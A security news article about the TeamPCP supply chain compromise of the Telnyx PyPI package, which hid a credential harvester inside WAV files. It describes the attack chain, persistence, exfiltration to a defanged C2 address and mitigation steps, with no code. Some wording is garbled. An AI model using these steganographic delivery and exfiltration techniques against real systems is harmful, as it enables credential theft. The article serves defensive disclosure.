TeamPCP, the threat actor behind supply chain attacks targeting Trivy, KICS, and litellm, compromised the Telnyx Python package by pushing two malicious versions to steal sensitive data.
Two versions, 4.87.1 and 4.87.2, published to the Python Package Index (PyPI) repository on March 27, 2026, hid the credential harvesting functionality inside a .WAV file. Users are encouraged to downgrade to version 4.87.0 immediately. The PyPI project is currently isolated.
Various reports from Aikido, Endor Labs, Ossprey Security, SafeDep, Socket, and StepSecurity indicate that malicious code is injected into ‘telnyx/_client.py’, causing it to be called when the package is imported into a Python application. This malware is designed to target Windows, Linux, and macOS systems.
“Our analysis reveals a three-step runtime attack chain on Linux/macOS consisting of audio steganographic delivery, in-memory data harvester execution, and encrypted exfiltration,” Socket said. “The entire chain runs within a self-destructing temporary directory and is designed to have near-zero forensic artifacts on the host.”
On Windows, the malware downloads a file named “hangup.wav” from a command-and-control (C2) server, extracts an executable file from the audio data, and drops it into the startup folder as “msbuild.exe.” This will persist across system reboots and run automatically every time a user logs into the system.
If the compromised host is running on Linux or macOS, it retrieves another .WAV file (“ringtone.wav”) from the same server to extract and run the third stage collector script. The credential harvester is designed to capture a wide range of sensitive data and extract it in the form of ‘tpcp.tar.gz’ via an HTTP POST request to ‘83.142.209’.[.]203:8080. ”
“The distinguishing technology of this sample, and the reason for the post title, is its use of audio steganography to deliver the final payload,” Ossprey Security said. “Rather than hosting a raw executable or Base64 blob on the C2 (both of which are easily flagged by network inspection and EDR), the attacker wraps the payload inside a .WAV file.”
It is currently unknown how TeamPCP obtained the package’s PYPI_TOKEN, but it may have been obtained through a previous credential collection operation.
“We believe the most likely vector is the literum breach itself,” said Kiran Raj and Rachana Missal, researchers at Endor Labs. “TeamPCP’s harvester swept environment variables, .env files, and shell history from every system that imported litellm. If your developer or CI pipeline has litellm installed and has access to the telnyx PyPI token, that token is already in TeamPCP’s hands.”
What’s notable about this attack is that there is no persistence mechanism on Linux and macOS, and a temporary directory is used to perform the malicious action, recursively deleting all of its contents once everything is complete.
“The strategic split is clear: Windows gains persistence. Binaries in the startup folder survive reboots, providing threat actors with long-term and repeatable access,” Socket explained. “Linux/macOS enables smash-and-grab: a single, high-speed data collection operation that collects everything of value, quickly steals it, and then disappears.”
This development comes days after threat actors distributed a trojanized version of the popular litellm Python package to compromise cloud credentials, CI/CD secrets, and keys for domains under their control.
This supply chain incident also reflects a newfound maturity. Rather than publishing malicious typosquats directly to open source package repositories, attackers have continually infected legitimate, trusted packages with large user bases to distribute malware to downstream users and expand their attack reach.
“Target selection throughout this campaign focuses on tools with advanced access to automated pipelines, such as container scanners (Trivy), infrastructure scanning tools (KICS), and AI model routing libraries (litellm),” Snyk said. “Each of these tools, by design, requires extensive read access to the systems on which they operate (credentials, configurations, environment variables).”
To mitigate this threat, we recommend that developers take the following actions:
Audit your Python environment and the requirements.txt file for telnyx==4.87.1 or telnyx==4.87.2. If found, replace it with a clean version. Assume compromise and rotate all secrets. Look for a file named “msbuild.exe” in your Windows startup folder. Block C2 and the extraction domain (‘83.142.209’).[.]203″).
The breach is part of a broader and ongoing campaign conducted by TeamPCP across multiple ecosystems, where the threat actor announced that it would collaborate with other cybercrime groups such as LAPSUS$ and an emerging ransomware group called Vect to carry out extortion and ransomware operations.
This also signals a shift in ransomware gangs, which have traditionally focused on initial access methods such as phishing and exploiting security flaws, to weaponize supply chain attacks that target open source infrastructure as an entry point for subsequent attacks.
“This puts a spotlight on everything in a CI/CD environment that isn’t locked down,” Socket said. “Security scanners, IDE extensions, build tools, and execution environments are granted broad access because we expect they will be needed. If an attacker is targeting the tools themselves, anything running within the pipeline should be treated as a potential entry point.”
Source link
